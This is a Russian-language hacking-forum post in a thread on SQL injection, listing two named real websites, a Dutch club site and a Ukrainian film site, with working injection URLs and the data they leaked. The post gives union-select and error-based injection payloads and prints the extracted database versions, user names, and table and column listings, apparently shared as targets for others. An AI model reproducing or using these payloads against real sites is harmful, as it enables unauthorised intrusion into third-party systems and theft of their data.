Тема: SQL Инъекции
Показать сообщение отдельно

  #6  
Старый 05.05.2010, 21:23
aka_zver
Постоянный
Регистрация: 17.09.2009
Сообщений: 775
С нами: 8762549

Репутация: 1069


По умолчанию
Сайт: http://www.cosmicus.nl
ТИЦ: 10
PR: 5
Пример запроса:
Код:
http://www.cosmicus.nl/site/index3.php?id=-186+union+select+1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),3,4,group_concat(0x0b,table_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+information_schema.tables--+
version - 5.0.24a-standard
database - cmcuser@localhost
user - cosmicus
os - pc-linux-gnu
tables:

Код:
CHARACTER_SETS,   
COLLATIONS,   
COLLATION_CHARACTER_SET_APPLICABILITY,   
COLUMNS,   
COLUMN_PRIVILEGES,   
KEY_COLUMN_USAGE,   
ROUTINES,   
SCHEMATA,   
SCHEMA_PRIVILEGES,   
STATISTICS,   
TABLES,   
TABLE_CONSTRAINTS,   
TABLE_PRIVILEGES,   
TRIGGERS,   
USER_PRIVILEGES,   
VIEWS,   
11_afdeling,   
11_bestuur,   
11_bestuur_controle,   
22_cms,   
23_cms_page,   
24_projecten,   
4images_categories,   
4images_comments,   
4images_groupaccess,   
4images_groupmatch,   
4images_groups,   
4images_images,   
4images_images_temp,   
4images_lightboxes,   
4images_postcards,   
4images_sessions,   
4images_sessionvars,   
4images_settings,   
4images_users,   
4images_wordlist,   
4images_wordmatch,   
99_cms,   
advertenties,   
afdeling,   
agenda,   
agenda_type,   
ap_poll,   
ap_settings,   
ap_theme,   
ap_users,   
ap_votes,   
artikels,   
auteurs,   
bestuur,   
bestuur_edit,   
blad,   
cmc_banner,   
cmc_bannerclient,   
cmc_bannerfinish,   
cmc_categories,   
cmc_components,   
cmc_contact_details,   
cmc_content,   
cmc_content_frontpage,   
cmc_content_rating,   
cmc_core_acl_aro,   
cmc_core_acl_aro_groups,   
cmc_core_acl_aro_sections,   
cmc_core_acl_groups_aro_map,   
cmc_core_l
columns:

Код:
CHARACTER_SET_NAME,   
DEFAULT_COLLATE_NAME,   
DESCRIPTION,   
MAXLEN,   
COLLATION_NAME,   
CHARACTER_SET_NAME,   
ID,   
IS_DEFAULT,   
IS_COMPILED,   
SORTLEN,   
COLLATION_NAME,   
CHARACTER_SET_NAME,   
TABLE_CATALOG,   
TABLE_SCHEMA,   
TABLE_NAME,   
COLUMN_NAME,   
ORDINAL_POSITION,   
COLUMN_DEFAULT,   
IS_NULLABLE,   
DATA_TYPE,   
CHARACTER_MAXIMUM_LENGTH,   
CHARACTER_OCTET_LENGTH,   
NUMERIC_PRECISION,   
NUMERIC_SCALE,   
CHARACTER_SET_NAME,   
COLLATION_NAME,   
COLUMN_TYPE,   
COLUMN_KEY,   
EXTRA,   
PRIVILEGES,   
COLUMN_COMMENT,   
GRANTEE,   
TABLE_CATALOG,   
TABLE_SCHEMA,   
TABLE_NAME,   
COLUMN_NAME,   
PRIVILEGE_TYPE,   
IS_GRANTABLE,   
CONSTRAINT_CATALOG,   
CONSTRAINT_SCHEMA,   
CONSTRAINT_NAME,   
TABLE_CATALOG,   
TABLE_SCHEMA,   
TABLE_NAME,   
COLUMN_NAME,   
ORDINAL_POSITION,   
POSITION_IN_UNIQUE_CONSTRAINT,
REFERENCED_TABLE_SCHEMA,   
REFERENCED_TABLE_NAME,   
REFERENCED_COLUMN_NAME,   
SPECIFIC_NAME,   
ROUTINE_CATALOG,   
ROUTINE_SCHEMA,   
ROUTINE_NAME,   
ROUTINE_TYPE,   
DTD_IDENTIFIER,   
ROUTINE_BODY,   
ROUTINE_DEFINITION,   
EXTERNAL_NAME,   
EXTERNAL_LANGUAGE,   
PARAMETER_STYLE,   
IS_DETERMINISTIC,   
SQL_DATA_ACCESS,   
SQL_PATH,   
SECURITY_TYP
==================================

Сайт: http://www.film.ua
ТИЦ: 50
PR: 4
Примеры запросов:
Код:
http://www.film.ua/production/index3.php?option=com_content&task=view&id=-1'+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid(version(),+1,+63),+floor(rand(0)*2)))--+    
http://www.film.ua/production/index3.php?option=com_content&task=view&id=-1'+union+select+1,2--+
Нужна рега ^^
version - 5.0.84-log
user - film2@localhost
database - film2
os - pc-linux-gnu
Последний раз редактировалось aka_zver; 05.05.2010 в 21:26..
 
Ответить с цитированием